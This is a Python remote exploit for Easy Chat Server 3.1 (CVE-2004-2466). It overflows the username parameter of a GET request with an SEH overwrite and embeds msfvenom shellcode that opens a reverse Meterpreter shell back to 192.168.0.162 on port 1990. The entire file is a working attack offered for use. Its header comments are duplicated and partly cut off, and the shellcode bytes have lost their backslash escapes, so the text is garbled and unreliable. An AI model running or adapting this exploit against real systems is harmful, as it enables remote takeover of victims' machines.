#!/usr/bin/python
# Easy Chat Server 3.1 Remote Exploit
# Written by r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawn #!/usr/bin/python
# Easy Chat Server 3.1 Remote Exploit
# Written by r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on Windows 7 32b SP1

import sys, socket, time

host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990
-f python -b "x00x20"
buf = ""
buf += "xbex4exddxd4x27xd9xe9xd9x74x24xf4x5bx29"
buf += "xc9xb1x54x31x73x13x83xc3x04x03x73x41x3f"
buf += "x21xdbxb5x3dxcax24x45x22x42xc1x74x62x30"
buf += "x81x26x52x32xc7xcax19x16xfcx59x6fxbfxf3"
buf += "xeaxdax99x3axebx77xd9x5dx6fx8ax0exbex4e"
buf += "x45x43xbfx97xb8xaexedx40xb6x1dx02xe5x82"
buf += "x9dxa9xb5x03xa6x4ex0dx25x87xc0x06x7cx07"
buf += "xe2xcbxf4x0exfcx08x30xd8x77xfaxcexdbx51"
buf += "x33x2ex77x9cxfcxddx89xd8x3ax3exfcx10x39"
buf += "xc3x07xe7x40x1fx8dxfcxe2xd4x35xd9x13x38"
buf += "xa3xaax1fxf5xa7xf5x03x08x6bx8ex3fx81x8a"
buf += "x41xb6xd1xa8x45x93x82xd1xdcx79x64xedx3f"
buf += "x22xd9x4bx4bxcex0exe6x16x86xe3xcbxa8x56"
buf += "x6cx5bxdax64x33xf7x74xc4xbcxd1x83x2bx97"
buf += "xa6x1cxd2x18xd7x35x10x4cx87x2dxb1xedx4c"
buf += "xaex3ex38xf8xa4xa8x03x55xb8x8axecxa4xb9"
buf += "xcdx2ax21x5fx81xe2x62xf0x61x53xc3xa0x09"
buf += "xb9xccx9fx29xc2x06x88xc3x2dxffxe0x7bxd7"
buf += "x5ax7ax1ax18x71x06x1cx92x70xf6xd2x53xf0"
buf += "xe4x02x02xfaxf4xd2xafxfax9exd6x79xacx36"
buf += "xd4x5cx9ax98x27x8bx98xdfxd7x4axa9x94xe1"
buf += "xd8x95xc2x0dx0dx16x13x5bx47x16x7bx3bx33"
buf += "x45x9ex44xeexf9x33xd0x11xa8xe0x73x7ax56"
buf += "xdexb3x25xa9x35xc0x22x55xcbxe4x8ax3ex33"
buf += "xa8x2axbfx59x28x7bxd7x96x07x74x17x56x82"
buf += "xddx3fxddx42xafxdexe2x4fx71x7fxe2x63xaa"
buf += "x96x6dx84x4dx97x8fxb9x9bxaexe5xfax1fx95"
buf += "xf6xb1x02xbcx9cxb9x11xbexb4"

junk = "A"*217
nseh = "xebx06x90x90" # short jump 6 bytes
seh = "x86xaex01x10" # pop pop ret 1001AE86 SSLEAY32.DLL
nops = "x90"*16

header = (
"GET /chat.ghp?username=" + junk + nseh + seh + nops + buf +
"&password=&room=1&sex=1 HTTP/1.1 "
"User-Agent: Mozilla/4.0 "
"Host: 192.168.1.136:80 "
"Accept-Language: en-us "
"Accept-Encoding: gzip, deflate "
"Referer: http://192.168.1.136 "
"Connection: Keep-Alive "
)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP
socket
client.connect((host, port)) # Connect to user supplied port and IP address
client.send(header) # Send the user command with a variable length name
client.close() # Close the Connection